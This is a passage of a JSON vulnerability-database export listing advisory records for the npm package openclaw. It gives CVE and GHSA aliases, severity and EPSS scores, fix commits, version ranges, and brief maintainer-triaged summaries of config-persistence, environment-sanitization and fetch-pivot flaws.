yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-xxj4-96ph-g6j6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z9a2-t66z-buga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89442?format=json","vulnerability_id":"VCID-zac2-wjyt-27af","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n## Summary\nGateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Talk Voice config persistence bug, but it is the same narrow authenticated persistence class and should be normalized below high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41379","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08343","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.08354","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41379"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41379","reference_id":"CVE-2026-41379","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41379"},{"reference_url":"https://github.com/advisories/GHSA-3q42-xmxv-9vfr","reference_id":"GHSA-3q42-xmxv-9vfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3q42-xmxv-9vfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41379","GHSA-3q42-xmxv-9vfr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zac2-wjyt-27af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90152?format=json","vulnerability_id":"VCID-zb5t-hhkm-kfeh","summary":"OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n## Summary\nHost exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00\n\nOpenClaw thanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41369","reference_id":"","reference_type":"","scores":[{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17279","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.1724","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00054","scoring_system":"epss","scoring_elements":"0.17276","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41369"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution"},{"reference_url":"https://github.com/advisories/GHSA-cg7q-fg22-4g98","reference_id":"GHSA-cg7q-fg22-4g98","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cg7q-fg22-4g98"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41369","GHSA-cg7q-fg22-4g98"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zb5t-hhkm-kfeh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50659?format=json","vulnerability_id":"VCID-zda4-uuw4-fkhp","summary":"OpenClaw: Node camera URL payload host-binding bypass allowed gateway fetch pivots\nOpenClaw accepted `camera.snap` / `camera.clip` node payload `url` fields and downloaded them on the gateway/agent host without binding downloads to the resolved node host.\n\nIn OpenClaw's documented trust model, paired nodes are in the same operator trust boundary, so this is scoped as medium-severity hardening. A malicious or compromised paired node could still steer gateway-host fetches during camera URL retrieval.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3bf19d6f40a0aaa55818b96eede3d05130c02533","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3bf19d6f40a0aaa55818b96eede3d05130c02533"},{"reference_url":"https://github.com/advisories/GHSA-2858-xg23-26fp","reference_id":"GHSA-2858-xg23-26fp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2858-xg23-26fp"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2858-xg23-26fp","reference_id":"GHSA-2858-xg23-26fp","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2858-xg23-26fp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerab